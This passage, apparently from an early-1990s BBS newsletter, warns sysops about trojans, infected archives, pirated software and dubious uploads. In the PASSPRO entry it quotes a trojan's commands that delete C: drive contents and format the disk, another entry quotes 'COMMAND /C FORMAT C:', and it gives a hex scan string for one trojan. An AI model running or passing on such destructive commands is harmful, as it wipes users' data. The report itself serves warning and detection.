|     BOUNCE.DOC          348 92-11-20 23:21:46 B28557FE A--W B 1
|     ------------ ----------
|         3 files      123502

| Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
| called BWE.  This claims to provide a "quick and easy way to exit
| Windows."  Geoffrey forwards this file info and disassembly report from
| John Eady (1:229/15, john.eady@canrem.com):
|
|           Name          Length   Mod Date    Time     CRC
|           ============  ======== =========  ======== ========
|           LICENSE.TXT       2656 14 Feb 93  22:01:14 46B50814
|           ORDER.TXT         2335 12 Feb 93  12:00:18 9D1A705E
|           README.TXT        3565 14 Feb 93  23:08:08 3EA7548E
|           BWE.EXE          19517 14 Feb 93  23:02:34 F1729CA4
|           ============  ======== =========  ======== ========
|           *total     4     28073 14 Feb 93  23:08:08
|
| "After debugging part of the virus, the following text appears (encrypted)
| in the infected program:
|
|       It's time for a math test curtesy of YAM!
|
|       And the question is...
|
|       What is 00 + 00 =
|
|       WRONG!!!! TRY AGAIN!
|
|       Admiral Bailey
|
| "This virus is self-encrypting, but does not use any stealth techniques
| (as far as I've seen). It doesn't appear to infect the boot record, or
| the boot partition record. It does not appear to infect .SYS files, or
| .OV? files.
|
| "If you feel you have been infected, examine any EXE or COM files that you
| believe are infected. Check the 4th and 5th bytes in a COM file for the
| characters "BA". Check the 12th and 13th bytes in a EXE file for the
| characters "BA". If you find a file like this, chances are you have been
| infected."

| Michael Toth (1:115/439.7) has received a report from a local SysOp, Matt
| Glosson of Audio Adrenalin, of a copy of TheDraw v4.60 (filename
| TDRAW460) that was uploaded to him with a few "modifications."  The file
| contained a "ZIP Comment" that had an ANSI bomb embedded in it, and also
| had a file called UFO!.COM inside the archive which would perform an
| unconditional format on your hard drive.  (Editorial - for Ian Davis'
| sake, I wish folks would leave TheDraw alone for a while.  No one program
| or programmer deserves this much abuse. - lj)

| Mike Wenthold (1:271/47) found a program under the filename GS2000 which
| contained the VCL 3 [Con] Virus.  The archive contains the following
| files:
|
|              Length    Date     Time    CRC      Filename
|             ======== ========= ====== ======== ============
|                 1984 22-Dec-91 01:40p 3527B16B GS2000.COM
|                  543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
|             ======== ========= ====== ======== ============
|                 2527                           2 files.
|
| The compression method (on this ZIP archive) was not included in his
| data.  According to Dave Lartique (1:3800/22) and Chris Gramer
| (1:271/47), the program is an "unprotect" for MicroProse's game Gunship
| 2000.  This appears to be another isolated incident of an infected
| legitimate file.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

  A copy of this file was sent to Mr. White and Mr. Logan, who were able to
  confirm the behaviour that William reported.  For the complete results of
  their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
  in the archive version of The Hack Report.

  More from  HW Bill Lambdin: he forwards a message from Terry Goodman in
  the U'NI Net virus conference concerning the file SCOMP.  This was
  advertised as a compression utility with better compression than PKZip.
  The file passes all virus checkers unless you also check data files in
  addition to executables.  In short, the executable loads a file called
  SCOMP.DAT, which it uses to create a file called CASPER.COM, which is
  apparently the Casper virus.

  Another report from Bill concerns a file he located called TAXTIP93.
  This archive contains a file called TAXTIP93.DAT, which the executable
  file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
  WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

  Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
  was described with a very short line ("'Password,' or some other short
  word," according to Brian).  The archive contained these files:

                               PASS    .PA1
                               PASS    .PA2
                               PASS    .PA3
                               PASSWORD.COM

  Brian looked inside the .com file, which he says looks like a compiled
  batch file, and found these strings/commands:

      Please Wait While Loading;
      It may take in between 30seconds to 5 minutes
      To unshrink nessessary files
      Please Turn off Screen, and wait for the beep.
      If You do not, your screen might not function
      the way it should.
      Turn Off Screen now, and press the space bar.

      /C REN pass.pa1 pa.exe
      pass.pa2 /C DEL c:\*.*
      pass.pa2 /C DEL c:\dos\*.*
      /C REN pa.exe pass.pa1
      pass.pa3 FORMAT
      c:
      /C CLS

  As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
  with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
  contains the single letter 'Y', and PASS.PA3 contains the single word
  'Yes'.  From the looks of things, this turns out to be a multipartite
  Trojan that attempts to format (what else?) your hard drive.

  Another multipartite Trojan was spotted by James Frazee (1:343/58), under
  the filename ADD_IT.  It contains these files:

                  Name of File    Size  Date
                  ADD_IT.ARJ     40888 02-11-93
                  =======================================
                  ADDIT1   DAT     34283 07-20-91   2:13a
                  ADD_IT   ANS       646 02-11-93   8:31p
                  ADDIT2   DAT     20634 04-09-91   5:00a
                  ADDIT    DOC       177 02-11-93   7:28p
                  ADDIT    COM      1391 02-11-93   8:14p
                  ADDIT3   DAT       138 02-11-93   8:13p
                  THEDRAW  PCK       650 02-11-93   8:31p

  When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
  end result was that the program deleted all of the files in the directory
  in which it was run.

  Matt Hargett (1:2430/1532) found a file called DRSLEEP which he says has
  a "cheap virii (sic) in it," but actually appears to be a Trojan.  When
  the executable, DRSLEEP.EXE is run, it deletes your COMMAND.COM file.
  Not much to write home about, but nasty enough.  Thanks, Matt.

  Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
  system was "taken down" by a file called DRAGON.  It claimed to be a
  Public Domain VGA and Sound Blaster supported game.  No symptoms were
  reported, except that he had to reformat his hard drive.

  Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
  Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
  In what might be an isolated incident, Josh says the file claimed to be a
  "really cool game, VGA gfx and SB sound."  However, the INSTALL program
  destroys hard disks.

| Bob Seaborn received a copy of this file and forwarded it to me - I have
| in turn forwarded it to Bill Logan and HW Jeff White for testing.  Stay
| tuned.

  John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
  that Lance Merlen (1:107/614) received an upload of this file, which,
  when checked with McAfee's ViruScan v100, reported over 5 viruses in the
  files in the archive.  No internal archive data was provided, so it is
  hard to say whether or not this is an isolated incident.

| Zack Jones (formerly 1:387/641: new address not yet known) reports a file
  called GAGS which was seen in the San Antonio area.  The file, described
  as "Some Christmas practical jokes," was analyzed by Bill Dirks (1:
  385/17) and confirmed as a Trojan. The program grabs control of several
  interrupt vectors, including the critical error handler.  The only way to
  stop it once it starts is to hit the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays the message, including something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."

  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Frans Hagelaars (2:512/2) has posted a message in several echos
  concerning a Trojan version of the Blue Wave Offline Mail Reader that had
  been circulating in his area.  According to the warning, the "hacked"
  version attacks your hard drive boot sector and partition table, and will
  then "play tricks" with RemoteAccess userlists and phone numbers.

  The filename of this version was not given in the report, nor was it made
  clear whether the BBS door or the Reader was involved.  If you have any
  questions about the security of your copy, remember that you can always
  obtain a safe copy from the BBS of the author, George Hatchew, at FidoNet
  address 1:2240/176, phone number 1-313-743-8464, or from any of the
  official distribution sites (which I believe are listed in the
  documentation for the program).

  Other previously reported Trojans:

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            HW Bill Lambdin.

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Reported by Peter Janssens
            (2:512/1).

  RAFIX     "Fixes little bugs" in RemoteAccess - program contains the
            string "COMMAND /C FORMAT C:" internally.  Reported by Sylvain
            Simard (1:242/158).

  RAMANAGE  Claimed USERS.BBS manager for RemoteAccess - yet another
            file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
            and places it in a download directory.  Reported by Peter
            Janssens.

            NOTE - Peter Hoek (2:281/506.15) reports a program that does
            the same thing, but uses the archive name RUNNING.ARJ to
            hold the USERS.BBS file.  No name of the Trojan was supplied.

  REAPER    ANSI bomb - remaps the keyboard to force file deletion and
            hard disk formatting - also generates insults.  Reported by
            Victor Padron (1:3609/14), via Rich Veraa (1:135/907).

  REDFOX    Batch file which deletes all DOS and system files.  Reported
            by Mike Wenthold.

  ROLEX     Possible isolated incident of an infection by the Keypress
            [Key] virus.  Reported by David Gibbs, via Michael Toth
            (1:115/220).

  SBBSFIX   Tries to format drive C: - contains two files, SBBSFIX.EXE and
            COM_P.OVL.  Reported by Clayton Mattatall (1:247/400).

  SPEED     Claims to "check your PC speed" - actually deletes all files
            on drive C:, including directories.  Reported by HW Nemrod
            Kedem.

  XYPHR2    No claim - contains the Power Pump companion virus (documented
            in the 1992 Full Archive of this report).  Reported by Mark
            Histed (1:268/332).

  YPCBR101  A copy of this file, uploaded to Simtel-20 and the oak mirror
            on archie.au, contained an infection of the Dark Avenger
            virus in the file YAPCBR.EXE.  Was supposed to be re-released
            as a clean archive.  Reported by John Miezitis (Internet,
            John.Miezitis@cc.utas.edu.au).

  =========================================================================

                        Pirated Commercial Software

  Program                 Archive Name(s)     Reported By
  =======                 ===============     ===========
  3-D Pool                3DPOOL              Michael Gibbs (via Bill
                                               Lambdin)

  Alone in the Dark       ALONEDEM            Mark Mistretta (1:102/1314)
   (full game-not a demo)

| ArcMaster (registered)  AM91REG             HW Scott Raymond

| Arctic Fox (game, by    AFOX                from the Meier/Morlan List,
|  Electronic Arts)                            confirmed by Emanuel Levy
|                                              (1:266/63) and Brendt Hess
|                                              (1:105/362)

  Atomix (game)           ATOMIX_             HW Matt Kracht

  A-Train by Maxis        ATRAIN1  through    Chris Blackwell of Maxis
                          ATRAIN6, also        (zoinks@netcom.com)
                          A-TRAIN1 through
                          A-TRAIN6

  Battle Chess            CHESS               Ron Mahan (1:123/61)

| BeetleJuice (game)      BEETLE              Mark Harris (1:121/99)
|                         BETLEJUC            Jason Robertson (1:250/802.2)
                          BJUICE              Alan Hess (1:261/1000)
                          BJ                  Bill Blakely
                                               (RIME Shareware echo)
                          BTLJWC              the Hack Squad
                                               (1:382/95)

| Budokan: the Martial    BUDOKAN             Michael Gibbs (Intelec, via
|  Spirit (game)                               HW Bill Lambdin)

  Check-It PC             CHECKIT             HW Bert Bredewoud
   Diagnostic Software    CHKIT20             HW Bill Lambdin

| Cisco Heat (game)       CISCO               Jason Robertson

  Commander Keen          _1KEEN5             Scott Wunsch (1:140/23.1701)
   (part 5)

  Copy II PC              COPYPC70            Ryan Park (1:283/420)

  Darkside (game)         DARKSIDE            Ralph Busch (1:153/9)

  DiskDupe Pro v4.03      DD403PRO            Jan Koopmans (2:512/163)

  Energizer Bunny Screen  ENERGIZR            Kurt Jacobson, PC Dynamics,
   Saver for Windows                           Inc., via HW Bill Dennison

  Family Feud (game)      FAM-FEUD            Harold Stein (1:107/236)

  F-Prot Professional     FP206SF             Mikko Hypponen
                                               (mikko.hypponen@compart.fi)

| GifLite 2.0 (regist.)   GL2-ECR             HW Scott Raymond

  Golden Axe (game)       GOLDAXE             Harold Stein

  Ian Bothams Cricket     IBCTDT              Vince Sorensen (1:140/121)

| Intelcom Modem Test     TESTCOM             from the Meier/Morlan List,
|  Utility (dist. with                         confirmed by Onno Tesink
|  Intel modems)                               (RIME, via HW Richard
|                                              Steiner)

  Killing Cloud (game)    CLOUD               Mike Wenthold

| Kings of the Beach      VBALL               Jason Robertson
   (game)

  Life & Death (game)     L&D1                Harold Stein
                          L&D2

  MegaMan (game)          MEGAMAN             Emanuel Levy (1:266/63)

| Microsoft Flight        FS                  Michael Gibbs (Intelec, via
|  Simulator                                   HW Bill Lambdin)

  Oh No, More Lemmings    ONMLEMM             Larry Dingethal (1:273/231)
   (complete-not demo)

  Over the Net            OTNINC1             Tim Sitzler (1:206/2708)
   (volleyball game)

| PKLite (registered)     PKL15REG            HW Scott Raymond

  PKZip v2.04c            PK204REG            HW Scott Raymond
   (Registered)

  PKZip v2.04c            PKZCFG              Mark Mistretta (1:102/1314)
   Configuration Editor

  PKZip v2.04e            PK204ERG            HW Scott Raymond
   (Registered)

  PKZip v2.04g            PKZ204R             HW Bill Dennison
   (Registered)

  PrintShop               PSHOP               Michael Gibbs, Intelec, via
                                               HW Bill Lambdin

  Psion Chess             3D-CHESS            Matt Farrenkopf (1:105/376)

| Q387 (registered)       Q387UTG             Michael Toth (1:115/439.7)

  QModem Pro              QMPRO-1             Mark Mistretta
                          QMPRO-2

  Rack 'Em (game)         RACKEM              Ruth Lee (1:106/5352)

| Microsoft Ramdrive      RAMDRIVE            Barry Martin (Intelec, via
|                                               HW Bill Lambdin)

  Sequencer Plus Pro      SPPRO               Tom Dunavold (Intelec,
                                               via Larry Dingethal)

  Shadow Warriors (game)  SHADOWG             Mark Mistretta

  Sharky's 3D Pool        POOL                Jason Robertson (1:250/801)

  Shez (Registered)       SHEZ84R             Eric Vanebrick (2:291/712)
                          SHEZ85R             HW Scott Raymond
|                         SHEZ87R
|                         SHEZ88R
|                         SHEZ89R

  SideKick 2.0            SK3                 Harold Stein

| SimCity (by Maxis)      SIM_CITY            Kevin Brott (Internet,
|                                       dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
                          SIMCTYSW            Scott Wunsch

| Smartdrive Disk Cache   SMARTDRV            Barry Martin (Intelec, via
|                                               HW Bill Lambdin)
                          SMTDRV40            Michael Toth (1:115/220)

  Star Control Vol. 4     STARCON             Carson M. Hanrahan
                                               (CompuServe 71554,2652)

  Streets on a Disk       STREETS             Harvey Woien (1:102/752)

  Teledisk (files         TDISK214            Mark Mistretta
   dated after Apr. 1991)
|                         TELE214R            Staale Fagerland (Internet,
|                                            staale.fagerland@euronetis.no)

  Vegas Casino 2 (game)   VEGAS2              The Hack Squad

| VPic v6.0 (registered)  VPIC60CR            HW Scott Raymond

  WinWay Resume for       WINRES              Erez Carmel (CompuServe,
   Windows                                      70523,2574)

  World Class Rugby       WCRFNTDT            Vince Sorensen

| ZipMaster (registered)  ZM31REG             HW Scott Raymond

  =========================================================================

                      ?????Questionable Programs?????

  First, a quick note - this section, along with the Information, Please
  section, are the only ones that have any information carried over from
  the 1992 report.  This is because many of the listings in these sections
  were not completely resolved when the last 1992 issue was published.  As
  usual, if anyone has any additional information on anything listed in
  these sections, _please_ help!

| HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
| called BIBLEPR (no description available) that appears a bit suspicious.
| The file contents are:
|
|               Length  Time    CRC-32  Attr  Name
|               ------  ----   -------- ----  ----
|                34176  11:26  d267f5de --w-  BIBLEPR.COM
|               158493  00:04  4298ac2d --w-  DATAPR-0.DAT
|               158493  00:04  d87adf4b --w-  DATAPR-1.DAT
|               158493  00:08  1213c6b3 --w-  DATAPR-2.DAT
|               159764  00:08  38d7cc06 --w-  DATAPR-3.DAT
|                 1572  24:05  3a60c80e --w-  BIBLEPR.DOC
|               ------                        -------
|               670991                              6
|
| When BIBLEPR.COM executes, Bill says it displays the following message:
|
|                       Greets from DOA!
|
|       Don't say I didn't warn you! You are also busted!
|
|       Expect a visit from the SPA!
|
|       Omni, I will avenge you!
|
| Bill's disassembly shows the file contains two INT 26 calls, which are
| DOS Absolute Disk Write instructions.  He said that if it contains a
| virus, he was unable to get it to replicate.  A copy of the archive has
| been sent to Glenn Jordan at Datawatch Software for testing.

| Bud Webster (1:264/165.7) reports an Apogee game being distributed under
| the filename BLOCK5.ZIP.  He says that the game displayed a message that
| said, "This game is not in the public domain or shareware."  There was
| only an .EXE file in the archive, and no documentation.
|
| Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
| Stratton (via HW Ken Whiton) state that this program was part of an
| Apogee disk called the "Super Game Pack," and that it is a game called
| "Block Five."  Joe Siegler (1:124/9006), the online support
| representative for Apogee Software Productions, confirms this, and states
| that the majority of the games on this disk, including this one, have
| been officially discontinued.  No word yet on whether they may be
| distributed via BBS systems - watch this space for updates.

| Here's an interesting point, brought to my attention by HW Richard
| Steiner and John Weiss of the RIME Shareware Conference.  In previous
| issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
| Francois Thunus, 2:270/25), as pirated copies of QModem v6.0.  However,
| Richard and John quite correctly point out that there was no release of
| QModem v6.0 - the program changed to QModem Pro after v5.
|
| From what Francois reported, I believe that what he saw was indeed Qmodem
| Pro, now a commercial-only program.  However, it was "released" under the
| above filenames.  So, is it a Hack?  Pirated File?  Or what?  Doesn't
| matter - it shouldn't be distributed.  Thanks, Richard and John, for
| making me fully engage my brain for a change. <grin>

| Jack Cross (1:3805/13) forwarded a copy of a DEBUG script posted in the
| FidoNet BATPOWER echo.  The script, which has created a great deal of
| discussion in that echo, created an archive (LZH) of the program
| TinyCache (filename TNYCACHE), a small disk cache program.
|
| A couple of folks who ran the program state that this is not a legitimate
| file.  In fact, it appears (from their reported symptoms) to be a Trojan.
| Destroyed FATs and reformatted hard drives have been reported after this
| program is run.
|
| I ran the script through DEBUG and un-archived the TNYCACHE.COM file.
| Afterwards, I checked it for viruses and looked at it with Vern Buerg's
| LIST Enhanced.  At first glance, the file doesn't even look like a real
| program:  it appears to be a corrupted file of some sort, and bears no
| resemblance to any .COM file I have ever seen.  If it is in fact a
| corrupted file, then the damage it could cause if run would be
| unpredictable at best.  My guess is that the file might not be an
| intentional dirty trick, but that the person who distributed it may have
| some cross-linked clusters on their hard drive.
|
| As I have said before to folks who contact Hack Central Station, I'm a
| reporter, not an AV expert:  my analysis is not as reliable as one coming
| from a real expert.  I have been offline for several days due to
| circumstances beyond my control, so I might have missed a report from
| Jack on this.  If not, I will forward a copy for testing.

  HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
  (615)966-3574) in the ILink VIRUS FILE conference about the archive
  ASCDEMO.  Marshall says that McAfee's ViruScan doesn't detect any
  infection until after you run it and it has infected other files.  No
  further information was supplied, other than the internal filenames
  (ASCDEMO.DOC and ASCDEMO.EXE).  I need further data on this before I can
  list it in the Trojan Wars section, so please advise if you have any.

  Emanuel Levy (1:266/63) says the file IM, reported by Michael Santos in
  the Intelec Net Chat conference and listed in the 1992 Full Archive
  edition of The Hack Report.  Michael's report was a "hearsay" report from
  one of his friends, and stated that the IM screen saver file caused a
  viral infection.

  Emanuel says the file is an "outer space screen saver," currently under
  the filename IM17.  Scott Wunsch (1:140/23.1701) says the program name is
  "Inner Mission," and he currently has version 1.6.  In both cases, the
  files were clean.

  So, it looks like either Michael's friend's system became infected from a
  different source than the IM file, or that an isolated incident of an
  infected IM is involved.  No way to tell at this writing.

  Long time readers of this report will remember a question concerning the
  status of a screen saver called TUNNEL.  Ove Lorentzon (2:203/403.6) and
  Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
  Steiner) both stated that the program was an internal IBM test program
  and was not intended for outside distribution.

  Your Hack Squad has received word from the author of the program, Dan
  Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
  the program has never been released to the general public.  According to
  Dan, "it is still owned by IBM, and as such has been given the IBM
  security classification 'IBM Internal Use Only' which means what it says:
  the program is not for distribution to non-IBM employees."

  Dan also says that several other "Internal Use Only" programs have been
  "leaked" to the outside world, which implies that these files should not
  be posted for download.  One such program was originally called Dazzle
  (NOT to be confused with the other popular DAZZLE screensaver), but has
  entered BBS distribution under the filename O-MY-GOD.  Another is a
  program that is usually included inside other archives:  the program name
  is PLAYANI.  Dan says this has been distributed "along with various
  animations," and also falls under the same Internal classification.

  A prime example of this is an archive called BALLS (not what you think).
  This is an animation of multiple chrome spheres rotating around each
  other above a red and white checkerboard platform.  In this case, both
  the player (PLAYANI) _and_ the animation are the property of IBM and are
  not intended for BBS distribution.

  Again, to quote Dan, "None of these programs are for external
  distribution; all are owned by IBM and are only for use inside IBM by IBM
  employees."  Thanks to Dan for all of his help.

  Donn Bly has cleared up the question on the status of the Sydex program
  TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
  Donn was kind enough to mail a copy of a letter sent to him by Sydex
  explaining that Teledisk is no longer shareware.  Here is an excerpt from
  the letter:

       "Effective April 1991, TeleDisk is no longer a shareware
       product.  After long consideration, we decided to
       discontinue our offering of the shareware edition of
       TeleDisk, and license it only as a commercial product.

       "Commercial licenses of TeleDisk are available from Sydex at
       $150 a copy.  All shareware distributors and BBS sysops who
       take time to check their sources are requested to remove
       TeleDisk from shareware distribution."

  The letter is signed by Miriam St. Clair for Sydex.  To summarize, Sydex
  is no longer accepting shareware registrations for TeleDisk, and asks
  that it be not be made available for download from BBS systems.

  Thanks to Donn for his help in this matter.

  HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
  Barnes of Mustang Software, Inc., about a "patch" program aimed at
  OffLine Xpress (OLX) v1.0.  The patch is supposed to allow OLX to
  read and reply to Blue Wave packets, along with a lot of other seemingly
  unbelievable feats.  Gwen Barnes did not seem to know of the patch, but
  published the following advice in the WildNet SLMROLX conference to
  anyone considering trying it:

    1. Make a complete backup of your system.
    2. Make sure you've got all the latest SCAN stuff from McAfee
    3. Try it, keeping in mind that it more than likely does nothing
       at all, or is a trojan that will hose your system.
    4. Get ready to re-format and restore from backups if this is in
       fact the case.

  No filename was given for this patch.  If anyone runs across a copy of
  it, please contact one of The HackWatchers or myself so that we can
  forward a copy to MSI for testing.

  HW Bill Lambdin reports that someone has taken all of McAfee Associates'
  antiviral programs and combined them into one gigantic (over 700k)
  archive.  He did not say whether the files had been tampered with, but he
  did send a copy to McAfee for them to dissect.  The file was posted under
  the filename MCAFEE99.  I would not suggest downloading this file:  as a
  matter of fact, this reporter prefers to call McAfee's BBS directly when
  a new version of any of their utilities comes out.  I highly recommend
  this method, since it insures that you will receive an official copy.

  HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
  echo about possible Trojans going around as PKZIP 2.21 and/or 2.22.  Stu
  also says that there is a warning about these in circulation.  If you
  have a copy of this warning, please send a copy to Hack Central Station
  (1:382/95).

  =========================================================================

                            Information, Please

  This the section of The Hack Report, where your Hack Squad asks for
  _your_ help.  Several reports come in every week, and there aren't enough
  hours in the day (or fingers for the keyboards) to verify them all.  Only
  with help from all of you can The Hack Report stay on top of all of the
  weirdness going on out there in BBSLand.  So, if you have any leads on
  any of the files shown below, please send it in: operators are standing
  by.

| Eric Alexander (1:3613/10) reported a file called PRINCE that appears to
| be a cracked commercial game of some sort.  One internal file,
| "predit.doc", contained a reference to someone called "The Fang."  I am
| not familiar with this game, so if anyone comes across Fang's version of
| PRINCE, please let me know what they've found.

| Dave Lartique (1:3800/22) found a game described as "a shareware game
| from Great Britain" called CAVEMAN.  This was described on another BBS he
| saw it on (under the filename CAVE) as an Apogee game, but it is not an
| Apogee release.  The game is called Caveman Ninja, and Dave says one of
| the internal files contains the following (somewhat garbled) text:
|
|     "DISTRIBUTED BY ELITE SYSTEM LTD   (C) 1991 DATA EAST CORPORATION"
|
| If memory serves, Data East is a producer of commercial games.  However,
| I have no knowledge of this game.  Can someone verify this?  Please
| advise.

| A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
| states that he had a user upload a file called TAG-NFO, which turned out
| to be a Trojan.  No details about the Trojan were given, so any
| confirmation of this would be appreciated.

  Onno Tesink (2:283/318) has sighted a file called LHA255B.  This claims
  to be version 2.55b of the LHA archiver, with a file date in the
  executable of 12/08/92.  He compared the file to the latest known
  official release, v2.13, and found two additional program options which
  were mentioned when the program was invoked with no command line
  (generating a help screen).  The archive contained nothing but the
  executable file.  Viral scans were negative.

  Many, MANY other folks have seen this file, as well as one called LHA252.
  Your Hack Squad has copies of both files.  The LHA252 file contains
  Japanese documentation, so it is a bit of a tough nut to crack.

  I have not heard of any further development going on by the author of
  LHA, H. Yoshi, but that wouldn't be a first. <g>  He is supposedly
  contactable via the NIFTY-SERVE service of CompuServe.  However, this
  service requires some knowledge of Japanese, and my only foreign language
  training was a semester of Czech at the University of Texas.

  If anyone knows of a new version of LHA, or has CompuServe access and the
  ability to converse in Japanese (and would be willing to assist), please
  contact your nearest HackWatcher or me and lend a hand.  This is getting
  very frustrating. <grin>

  HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
  Conference about two files.  The archives, called PHOTON and NUKE, are
  possibly droppers, containing a file called NUKE.COM which "will trash
  your HD."

  Pat Finnerty (1:3627/107) sent a reply to the last report of this,
  stating that he has a copy of a PC Magazine utility called NUKE.COM,
  which is used to remove subdirectories which contain "nested subs,
  hidden, read-only (you name it)."  He says that the command NUKE C:\ will
  effectively delete everything on a hard drive, with no chance of repair.
  This is merely the way the program is designed.

  I do not know if this is what happened in Mario's case, or if Mario
  actually found a copy (read: isolated incident) which was infected. Bill
  has asked Mario for further information, and I would like to echo his
  call for help.  If you know of this, please lend a hand.

  Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
  echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
  Rich Bongiovanni.  Rich reports that there is a file floating around
  called DEMON WARS (archive name DMNWAR52) that is "infected with a
  virus."  If true, this may be an isolated incident.  I would appreciate
  confirmation on this.

  Greg Walters (1:270/612) reports a possible isolated incident of a
  problem with #1KEEN7.  When he ran the installation, he began seeing on
  his monitor "what looked like an X-rated GIF."  The file apparently
  scanned clean.  Any information on similar sightings would be
  appreciated.

  A report from Todd Clayton (1:259/210) concerns a program called
  ROBO.EXE, which he says claims to apparently "make RoboBoard run 300%
  faster."  He says he has heard that the program fools around with your
  File Allocation Table.  I have not heard any other reports of this, so I
  would appreciate some confirmation from someone else who has seen similar
  reports.

  Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
  possible hack of FEBBS called F192HACK.  I have not seen this file, nor
  has the author of FEBBS, Patrik Sjoberg (2:205/208).  He forwards the
  file sizes in the archive, reported here:

        Name          Length      Mod Date  Time     CRC
        ============  ========    ========= ======== ========
        FEBBS.EXE       220841    09 Mar 92 21:17:00 96D2E08D
        014734.TXT        1403    26 Aug 92 01:59:18 3B9F717F
